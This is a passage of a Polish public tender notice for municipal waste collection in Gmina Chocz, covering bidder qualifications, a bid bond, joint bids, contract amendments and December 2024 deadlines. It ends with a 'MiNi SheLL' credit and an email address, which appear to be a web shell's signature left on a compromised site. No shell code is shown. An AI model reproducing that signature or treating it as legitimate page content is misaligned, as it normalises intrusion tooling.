na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>-	w postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają wpis <br/>do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Burmistrza Gminy Chocz, zgodnie z art. 9b i 9c ustawy z dnia 13 września 1996 r. <br/>o utrzymaniu czystości i porządku w gminach oraz art. 43 ustawy z dnia <br/>6 marca 2018 r. Prawo przedsiębiorców w zakresie kodów odpadów komunalnych objętych przedmiotem zamówienia.<br/>-	w postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają wpis <br/>do prowadzonego przez Marszałka Województwa Wielkopolskiego rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII), o którym mowa w art. 49 <br/>i następne ustawy z dnia 14 grudnia 2012 r. o odpadach i który to rejestr stanowi element Bazy Danych o produktach i opakowaniach oraz o gospodarce odpadami.<br/>3)	sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>W postępowaniu mogą wziąć udział Wykonawcy, którzy:<br/>-	dysponują bazą transportowo–magazynową spełniającą wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, usytuowaną w Gminie Chocz lub w odległości nie większej niż 60 km od granicy tej gminy oraz posiada tytuł prawny do terenu na którym jest ona zlokalizowana.<br/>-	dysponują dwoma pojazdami, przystosowanymi do odbierania niesegregowanych (zmieszanych) odpadów komunalnych, spełniającymi wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. <br/>w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>-	dysponują dwoma pojazdami, przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, spełniającymi wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>-	dysponują jednym pojazdem, przystosowanym do odbierania odpadów bez funkcji kompaktującej, spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>-	dysponują jednym pojazdem, przystosowanym do odbierania odpadów, spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia <br/>11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z możliwością wjazdu na drogi o szerokości do 3,0 m, z dopuszczalną masą całkowitą do 12 ton, szerokością zabudowy pojazdu nieprzekraczającą 2,5 m.<br/>5)	doświadczeniem: w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - wykonał:<br/>•	co najmniej jedną usługę (dla jednego zamawiającego) odbierania odpadów komunalnych zmieszanych w ilości co najmniej 300 Mg/rok oraz odpadów komunalnych gromadzonych selektywnie w ilości co najmniej 200 Mg/rok.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100), <br/>2.	Wadium musi obejmować pełen okres związania ofertą. <br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp. <br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Urzędu Miejskiego Gminy Chocz - Bank Spółdzielczy w Pleszewie Oddział w Choczu 89 8407 0003 3000 0101 2000 0009.<br/>5. Tytuł przelewu winien umożliwić identyfikację przetargu, którego dotyczy wadium oraz określać podmiot, w którego imieniu jest wpłacane – w przypadku, jeśli przelewu nie dokonuje Wykonawca składający ofertę. Celem właściwej identyfikacji wpłaty z tytułu wadium powinny zawierać w tytule przelewu znak sprawy postępowania tj. ZP.271.13.2024. <br/>6.	Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego). <br/>7.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty.<br/>8.	W oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy: <br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. <br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, <br/>3) kwotę gwarancji/poręczenia, <br/>4) termin ważności gwarancji/poręczenia, <br/>5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>b)	warunki udziału w postępowaniu wykonawcy mogą spełniać łącznie;<br/>c)	warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w ppkt 2) lit. b), jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane;<br/>d)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane;<br/>e)	w przypadku, o którym mowa w lit. c) i d), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie i w granicach art. 455 ustawy dnia 11 września 2019 r. Prawo zamówień publicznych, Zamawiający dopuszcza możliwość zmiany zawartej umowy o zamówienie w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zmiana postanowień niniejszej umowy może nastąpić w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem wskazanych warunków ich wprowadzenia:<br/>1)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku,	gdy ulegną	zmianie powszechnie obowiązujące przepisy w zakresie wysokości stawki podatku VAT na przedmiot usługi;<br/>2)	dopuszczalna jest zmiana umowy polegająca na zmianie ilości odbieranych odpadów i wysokości wynagrodzenia za przedmiot zamówienia w przypadku wystąpienia powodów niezależnych od Zamawiającego (np. w przypadku błędnego oszacowania ilości odpadów) z zachowaniem cen jednostkowych podanych w ofercie;<br/>3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy);<br/>4)	dopuszczalne są zmiany postanowień umowy, które wynikaj ą ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego;<br/>5)	dopuszczalna jest zmiana numeru rachunku bankowego Wykonawcy, podanego w umowie, w przypadku zmiany rachunku bankowego Wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia;<br/>6)	konieczności zmiany harmonogramu odbioru odpadów komunalnych, przy zachowaniu częstotliwości odbioru odpadów;<br/>7)	konieczności zmian w strukturze zamówienia kwalifikowanego w Specyfikacji Warunków Zamówienia jako prawo opcji wynikającej z konieczności zwiększenia odbioru ilości odpadów odbieranych selektywnie przy jednoczesnym zmniejszeniu ilości odbieranych odpadów zmieszanych lub na odwrót, przy jednoczesny m zastrzeżeniu, że zmiany te (po ponownym przeliczeniu maksymalnego wynagrodzenia) nie mogą spowodować zwiększenia wynagrodzenia;<br/>8)	postanowienia zawartej umowy w zakresie udziału podwykonawców (jeżeli Wykonawca przewidywał powierzenie części zamówienia do wykonania podwykonawcom) w realizacji zamówienia mogą ulec zmianie w przypadku zmiany podwykonawców i powierzenia części zamówienia nowym podwykonawcom. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia dostępna pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com